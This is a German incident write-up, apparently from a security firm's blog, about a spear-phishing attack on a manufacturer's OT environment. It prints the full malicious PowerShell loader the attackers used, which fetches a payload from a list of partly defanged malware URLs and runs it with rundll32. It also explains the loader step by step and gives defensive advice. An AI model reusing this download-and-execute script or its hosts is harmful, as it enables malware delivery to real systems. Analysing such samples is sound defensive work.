Bei einem unserer jüngsten Kundenfälle wurde ein führender deutscher Hersteller Opfer einer Spear-Phishing-Kampagne im Bereich der Operational Technology (OT). Dabei gab sich der Angreifer als Lieferant des Unternehmens aus und verschickte eine legitime E-Mail mit bösartigem Anhang. Beim Öffnen des Anhangs führte sich ein Skript selbständig aus, welches dem Angreifer über eine Malware Zugang zum System und der PLC erlaubte.
„PowerShell-Skript“ versucht schadhafte URLs auszuführen
Über die kodierte Meldung „Non interactive PowerShell“ erkannte unser Blue Team die Ausführung des folgenden PowerShell-Skripts und konnte diese zeitnah melden, um eine Verbreitung der Malware zu verhindern:
„Start-Sleep -Seconds 5;$Unridiculous = („hxxps://centraltrucks.com.br/jexc/O3KMXHC5jWWg,hxxps://heraldoturismo.com.br/on3t7A/EAVNt,hxxps://brevardbusinessguide.com/P4m9JdF/E8yakQsj,https://ladulceriacandiesnmorellc.com/bv2Zr0t/poJ96,htxxps://pryhmshift.com/Ow2/qEY9FeT85FU,hxxps://tomazellapresentes.com.br/ZeUvz7b/dl67juhSl,hxxps://temeculatireshop.com/1uwog/a12EecS,hxxps://plantationlandscapingandirrigation.com/7EwmGoE/DFL1t,hxxps://pathways4success.com/ZsF1aj9/kb4X4p“).split(„,“);foreach ($Reposedness in $Unridiculous) {try {wget $Reposedness -TimeoutSec 15 -O $env:TEMP\PaintyDyscrasite.FontallyCivilization;if ((Get-Item $env:TEMP\PaintyDyscrasite.FontallyCivilization).length -ge 100000) {start rundll32 $env:TEMP\\PaintyDyscrasite.FontallyCivilization,X555;break;}}catch {Start-Sleep -Seconds 5;}}“
Der Skriptname „Start-Sleep -Seconds 5“ am Anfang des Skripts gibt an, dass dieses zunächst fünf Sekunden wartet, bevor es ausgeführt wird. Der Variable „$Unridiculous“ folgt im Anschluss eine Liste von schadhaften URLs, die durch das Komma getrennt sind und anhand der Methode „split“ in separate Einträge aufgeteilt werden. Schließlich ruft die „foreach“-Schleife jede URL in der Liste auf und versucht, sie mit dem Befehl „wget“ herunterzuladen. Ist der Download erfolgreich und die Größe der heruntergeladenen Datei größer oder gleich 100.000 Bytes, wird der Befehl „start rundll32“ ausgeführt, um die Datei auszuführen. Schlägt der Download fehl, wird das Skript fünf Sekunden lang pausiert und versucht anschließend, die nächste URL in der Liste herunterzuladen.
Schützen Sie sich durch umfassende Sicherheitsmaßnahmen
Durch erhöhte Sicherheitsmaßnahmen und Mitarbeiter-Schulungen will das Unternehmen solche Angriffe in Zukunft vermeiden.
Grundsätzlich empfehlen wir allen Herstellern, die OT nutzen, die Implementierung eines mehrschichtigen Sicherheitsansatzes. Dieser sollte die Schulung der Mitarbeiter, die Implementierung von Sicherheitsmaßnahmen wie Firewall- und Antiviren-Software, die Überwachung des Netzwerkverkehrs sowie die regelmäßige Aktualisierung der OT-Systeme beinhalten.
Für Unternehmen, die PLCs und andere OT-Geräte einsetzen, ist es von enormer Wichtigkeit, sich der Gefahren von Cyberangriffen bewusst zu sein und entsprechende Sicherheitsmaßnahmen zu ergreifen. Denn mithilfe richtiger Vorbereitung und Überwachung können Unternehmen Angriffe erkennen und abwehren, bevor sie zu ernsthaften Problemen führen.